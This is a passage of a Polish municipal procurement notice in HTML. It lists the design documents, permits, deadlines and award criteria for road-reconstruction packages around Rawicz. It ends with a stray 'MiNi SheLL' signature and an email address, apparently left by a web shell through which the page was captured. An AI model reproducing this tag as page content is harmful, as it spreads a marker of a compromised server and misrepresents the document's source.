                          inwestycji  drogowej polegającej na rozbudowie ul. Bocianiej w Masłowie. 
Wykonawca po opracowaniu projektów oraz uzyskaniu decyzji (ostatecznych) o pozwoleniu na przebudowę dróg z odwodnieniem wraz budową oświetlenia ulicznego i kanalizacji deszczowej, zgłoszeniu w organie budowlanym rozpoczęcie robót oraz uzyskaniu decyzji o zezwoleniu na realizację inwestycji drogowej (wraz z niezbędnymi uzgodnieniami i opiniami), będzie zobowiązany do zdania Zamawiającemu niżej wymienione dokumenty:
1)	po 3 egzemplarze projektu budowlano - wykonawczego osobno dla każdej ulicy i branży  wraz z wszystkimi w tym zakresie uzgodnieniami + 1 egzemplarz w wersji elektronicznej w formacie dwg (nie nowszy niż Auto Cad 2006) lub dxf oraz w pdf,
2)	2 egzemplarze specyfikacji technicznej wykonania i odbioru robót budowlanych w/w przedmiotu zamówienia + 1 egzemplarz w wersji elektronicznej w word i pdf,
3)	1 komplet szczegółowego kosztorysu inwestorskiego i zerowego wraz z przedmiarem robót + 1 egzemplarz
w wersji elektronicznej wykonane w formacie kst lub ath na płycie CD lub dyskietce,
4)	3 egzemplarze dotyczące bezpieczeństwa i ochrony zdrowia (może stanowić część składową projektu budowlano - wykonawczego) + 1 egzemplarz w wersji elektronicznej,
5)	3 egzemplarze dokumentacji zmiany organizacji ruchu po oddaniu dróg do użytku + 1 egzemplarz w wersji elektronicznej w formacie dwg lub dxf (nie nowszy niż Auto Cad 2006) oraz w pdf,
6)	5 egzemplarzy projektu podziału nieruchomości z czego 3 egz. dołączyć do projektu. Po stwierdzeniu, że decyzja na realizację inwestycji  drogowej stanie się ostateczna Wykonawca zobowiązany będzie do sporządzenia wyciągu zmian gruntowych  dla podzielonej nieruchomości i  przekazać go Zamawiającemu , oraz będzie zobowiązany do  wyniesienia i utrwalenia nowych granic w terenie.  
7)	ostateczną  decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, 
8)	ostateczną decyzję o pozwoleniu na przebudowę ulic z odwodnieniem (Wrzosowa, Jaśminowa, Chabrowa) wraz z budową oświetlenia ulicznego,
9)	ostateczną decyzję o pozwoleniu na przebudowę dróg oraz budowę kanalizacji deszczowej ( dotyczy trzech dróg wewnętrznych w Masłowie),
10)	zgłoszenie właściwemu organowi rozpoczęcie robót związanych z przebudową i odwodnieniem ul. Żniwnej (wniosek winien być potwierdzony przez organ budowlany - Starostwo Powiatowe w Rawiczu),  
11)	ostateczną decyzję o zezwoleniu na realizację inwestycji drogowej polegającej na rozbudowie ul. Bocianiej,
12)	oświadczenie, że opracowana dokumentacja projektowa jest zgodna z obowiązującymi przepisami oraz zasadami wiedzy technicznej,
13)	oświadczenie o przeniesieniu na rzecz Zamawiającego wszelkich uprawnień wynikających z tytułu praw autorskich oraz pokrewnych, jak również wyrażenie zgody na wykorzystanie dokumentacji projektowej do celów opisu przedmiotu zamówienia i udostępnienia jej w formie elektronicznej oraz papierowej przy ogłaszaniu przetargu na roboty budowlane.
14)	podkłady mapowe wykorzystane do prac projektowych - do zdania Zamawiającemu. 	
Ilość dokumentów wymienionych wyżej należy złożyć u ZAMAWIAJĄCEGO. 
Zakres ten nie obejmuje tych egzemplarzy projektów, które Wykonawcy będą potrzebne do  złożenia we właściwym organie architektoniczno - budowlanym, celem uzyskania warunków, uzgodnień, pozwoleń. Przy wycenie przedmiotu zamówienia należy uwzględnić ilość egzemplarzy przeznaczonych dla ZAMAWIAJĄCEGO, jak również te, które należy złożyć w innych organach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3. Przebudowa ul. Marcinkowskiego w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje w szczególności:
PAKIET 3 - opracowanie projektów budowlano-wykonawczych oraz uzyskanie pozwolenia na przebudowę drogi wraz z budową kanalizacji deszczowej w ul. Marcinkowskiego w Rawiczu.
Wykonawca po opracowaniu projektów oraz uzyskaniu decyzji (ostatecznej) o pozwoleniu na przebudowę ul. Marcinkowskiego wraz z budową kanalizacji deszczowej (wraz z niezbędnymi uzgodnieniami i opiniami), będzie zobowiązany do zdania Zamawiającemu niżej wymienione dokumenty:
1)	po 3 egzemplarze projektu budowlano - wykonawczego osobno dla każdej branży wraz z wszystkimi w tym zakresie uzgodnieniami + 1 egzemplarz w wersji elektronicznej w formacie dwg (nie nowszy niż Auto Cad 2006) lub dxf oraz w pdf,
2)	2 egzemplarze specyfikacji technicznej wykonania i odbioru robót budowlanych w/w przedmiotu zamówienia + 1 egzemplarz w wersji elektronicznej w word i pdf,
3)	1 komplet szczegółowego kosztorysu inwestorskiego i zerowego wraz z przedmiarem robót + 1 egzemplarz
w wersji elektronicznej wykonane w formacie kst lub ath na płycie CD lub dyskietce,
4)	3 egzemplarze dotyczące bezpieczeństwa i ochrony zdrowia (może stanowić część składową projektu budowlano - wykonawczego) + 1 egzemplarz w wersji elektronicznej,
5)	ostateczną decyzję o pozwoleniu na przebudowę drogi wraz z budową kanalizacji deszczowej,
6)	oświadczenie, że opracowana dokumentacja projektowa jest zgodna z obowiązującymi przepisami oraz zasadami wiedzy technicznej,
7)	oświadczenie o przeniesieniu na rzecz Zamawiającego wszelkich uprawnień wynikających z tytułu praw autorskich oraz pokrewnych, jak również wyrażenie zgody na wykorzystanie dokumentacji projektowej do celów opisu przedmiotu zamówienia i udostępnienia jej w formie elektronicznej oraz papierowej przy ogłaszaniu przetargu na roboty budowlane.
8)	podkłady mapowe wykorzystane do prac projektowych - do zdania Zamawiającemu.
Ilość dokumentów wymienionych wyżej należy złożyć u ZAMAWIAJĄCEGO. 
Zakres ten nie obejmuje tych egzemplarzy projektów, które Wykonawcy będą potrzebne do  złożenia we właściwym organie architektoniczno - budowlanym, celem uzyskania warunków, uzgodnień, pozwoleń. Przy wycenie przedmiotu zamówienia należy uwzględnić ilość egzemplarzy przeznaczonych dla ZAMAWIAJĄCEGO, jak również te, które należy złożyć w innych organach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4. Przebudowa drogi w Dąbrówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje w szczególności:
PAKIET 4 - opracowanie projektów  budowlano-wykonawczych oraz zgłoszenie przebudowy  drogi w Dąbrówce wraz z odwodnieniem.  
Wykonawca po opracowaniu projektów  oraz zgłoszeniu do właściwego organu przebudowy drogi (wraz z niezbędnymi uzgodnieniami i opiniami)  będzie zobowiązany do zdania Zamawiającemu niżej wymienione dokumenty:
1)	po 3 egzemplarze projektu budowlano - wykonawczego wraz z wszystkimi w tym zakresie uzgodnieniami + 1 egzemplarz w wersji elektronicznej w formacie dwg (nie nowszy niż Auto Cad 2006) lub dxf oraz w pdf,
2)	2 egzemplarze specyfikacji technicznej wykonania i odbioru robót budowlanych w/w przedmiotu zamówienia + 1 egzemplarz w wersji elektronicznej w word i pdf,
3)	1 komplet szczegółowego kosztorysu inwestorskiego i zerowego wraz z przedmiarem robót + 1 egzemplarz
w wersji elektronicznej wykonane w formacie kst lub ath na płycie CD lub dyskietce,
4)	3 egzemplarze dotyczące bezpieczeństwa i ochrony zdrowia (może stanowić część składową projektu budowlano -wykonawczego) + 1 egzemplarz w wersji elektronicznej,
5)	3 egzemplarze dokumentacji zmiany organizacji ruchu po oddaniu drogi do użytku + 1 egzemplarz w wersji elektronicznej w formacie dwg lub dxf (nie nowszy niż Auto Cad 2006) oraz w pdf,
6)	zgłoszenie właściwemu organowi rozpoczęcie robót związanych z przebudową drogi wraz z odwodnieniem  (wniosek winien być potwierdzony przez organ budowlany - Starostwo Powiatowe w Rawiczu),  
7)	oświadczenie, że opracowana dokumentacja projektowa jest zgodna z obowiązującymi przepisami oraz zasadami wiedzy technicznej,
8)	oświadczenie o przeniesieniu na rzecz Zamawiającego wszelkich uprawnień wynikających z tytułu praw autorskich oraz pokrewnych, jak również wyrażenie zgody na wykorzystanie dokumentacji projektowej do celów opisu przedmiotu zamówienia i udostępnienia jej w formie elektronicznej oraz papierowej przy ogłaszaniu przetargu na roboty budowlane.
9)	podkłady mapowe wykorzystane do prac projektowych - do zdania Zamawiającemu.
Ilość dokumentów wymienionych wyżej  należy złożyć u ZAMAWIAJĄCEGO. 
Zakres ten nie obejmuje tych egzemplarzy projektów, które Wykonawcy będą potrzebne do  złożenia we właściwym organie architektoniczno - budowlanym, celem uzyskania warunków, uzgodnień, pozwoleń. Przy wycenie przedmiotu zamówienia należy uwzględnić ilość egzemplarzy przeznaczonych dla ZAMAWIAJĄCEGO, jak również te, które należy złożyć w innych organach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com